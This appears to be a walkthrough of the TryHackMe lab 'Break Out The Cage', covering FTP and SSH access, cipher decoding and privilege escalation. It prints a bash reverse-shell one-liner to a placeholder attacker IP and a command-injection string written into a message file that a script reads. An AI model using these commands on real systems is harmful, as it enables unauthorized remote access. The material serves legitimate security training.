
Complete Guide: Break Out The Cage TryHackMe Room Walkthrough


LINK: https://tryhackme.com/room/breakoutthecage1


RECON/SCANNING

So first we will run Nmap (or NmapAutomator) to scan the target for open ports.

Here we can see that three ports are open, so let's check out each port one by one:

  • As you can see, anonymous login is allowed on FTP, so let's proceed with that.

After logging in to FTP anonymously we can see a file named dad_tasks, so we transfer it to our local machine using the get command.

There is also an HTTP web page on port 80, so let's check it out:

I searched the website but couldn't find anything useful, so let's move on to the file we transferred to our local machine.

As you can see, the file is plain ASCII text, so we view its contents with the cat command and find a base64-encoded string. Let's decode it:

Decoding the base64 string gives us another encoded message, so let's find out which kind of cipher it is by running it through the ciphertext analyzer on the dcode.fr website.

As you can see, it identified it as a Vigenère cipher, so let's decode this ciphertext:

Decoding the ciphertext gives us the password for Weston, which answers the 1st question.

Since we saw that port 22 (SSH) is open, why don't we try to log in as Weston through SSH?


SSH LOGIN

Run ssh weston@ip (replace ip with the target's IP address) and enter the password when prompted.

BOOM !!💥 We logged in as Weston through SSH.

Now let's enumerate and look for flags and other interesting things. First I ran sudo -l to check whether any binary can be run with sudo.

As a result we can see there is a binary, /usr/bin/bees, that can be run with sudo, but suddenly a message appeared on the terminal which pointed towards a user named cage.

So I searched for files owned by this user using:

find / -type f -user cage 2>/dev/null

As a result I got two files under the /opt/….. directory, so let's cat their contents one by one.

Its content shows that it is a Python script which opens another file in the same directory, so let's cat that file as well.

Nice!! It contains the list of messages that keep appearing on our terminal from time to time, which means the Python script above is opening this file and sending those messages to us.

Let's check the permissions of the files in the /.files directory.

As you can see, the file has group read-write (rw) permission, and when we check with the id command we can see that Weston is a member of the cage group, so Weston has those read-write rights on it.

So we can craft a reverse shell payload and overwrite the file with it.

Since /tmp is writable, we will create our payload there using these commands:

echo '#!/bin/bash' > /tmp/shell.sh
echo 'bash -i >& /dev/tcp/ATTACK_IP/4444 0>&1' >> /tmp/shell.sh
chmod +x /tmp/shell.sh

# don't forget to replace ATTACK_IP with your own local machine's IP

Now set up a listener on your local machine.

Now trigger the payload to get a reverse shell on your local machine using this command:

printf 'Hello;/tmp/shell.sh\n' > /opt/.dads_scripts/.files/filename

Now wait until the Hello message above is displayed, then go to your listener and you will see that you got a shell as the user cage.


Getting User Flag

First, stabilize this shell using the commands in the link below:

How to stabilize a simple reverse shell to a fully interactive terminal

Once the shell is stabilized, let's look for the user flag. Listing the files in the current directory, which is /home/cage, we find email_backup and Super_Duper_Checklist, which contains our user flag.


Getting Root Flag

Once we have the user flag, let's check out the other directory, email_backup. In it we find a file named email_3 whose content holds the password for the root user, but it is encoded, and this time we also get a bold word 'FACE', which strongly hints at the key for cracking the encoded ciphertext.

So once again I went to the Vigenère decoder on the dcode.fr website, where you can either

brute force it with automatic decryption

or use the key FACE to directly get the password.
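As an added example (not part of the original walkthrough), here is the two-layer decode chain seen in dad_tasks and email_3 written out in Python: base64 first, then Vigenère with a key, plus a small dictionary-scored key guess standing in for dcode.fr's automatic decryption. The sample ciphertext, the candidate key list and the word list are constructed for this example; only the key FACE comes from the room.

```python
import base64
import string
from itertools import cycle

ALPHABET = string.ascii_uppercase


def vigenere(text, key, decrypt=True):
    """Shift every letter of `text` by the matching letter of `key`.

    Non-letters pass through unchanged and do not consume a key character
    (an assumed convention; check your tool's setting if results look off).
    """
    keystream = cycle(ALPHABET.index(k) for k in key.upper() if k in ALPHABET)
    out = []
    for ch in text:
        if ch.isalpha():
            shift = next(keystream)
            if decrypt:
                shift = -shift
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)


def decode_task_file(b64_blob, key):
    """First layer base64, second layer Vigenère: the chain used in dad_tasks."""
    ciphertext = base64.b64decode(b64_blob).decode()
    return vigenere(ciphertext, key)


# Tiny constructed word list: a candidate key scores one point per hit.
COMMON_WORDS = ("the", "key", "is", "password", "root", "user")


def guess_key(ciphertext, candidates, words=COMMON_WORDS):
    """Poor man's automatic decryption: try each candidate key and keep the
    one whose plaintext contains the most dictionary words."""
    def score(key):
        plain = vigenere(ciphertext, key).lower()
        return sum(plain.count(w) for w in words)
    return max(candidates, key=score)


# Constructed sample (not the room's real file): "The key is password"
# encrypted with key FACE, then base64-encoded.
SAMPLE_DAD_TASKS = "WWhnIG9qeSBrdyB1YXV3Ym90aA=="

if __name__ == "__main__":
    ct = base64.b64decode(SAMPLE_DAD_TASKS).decode()
    print("guessed key:", guess_key(ct, ["BEES", "CAGE", "FACE"]))
    print("plaintext:", decode_task_file(SAMPLE_DAD_TASKS, "FACE"))
```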

Now that we have the root user's password, let's su root and get the root flag: go to the root directory, list the files, and read the content of the email_2 file. That gives you the root flag, which is the answer to the 3rd question.

WE FINALLY DID IT !!!! CHALLENGE SOLVED !!

For any query or problem, either leave a comment or contact me at reapsec.com

THANKS FOR READING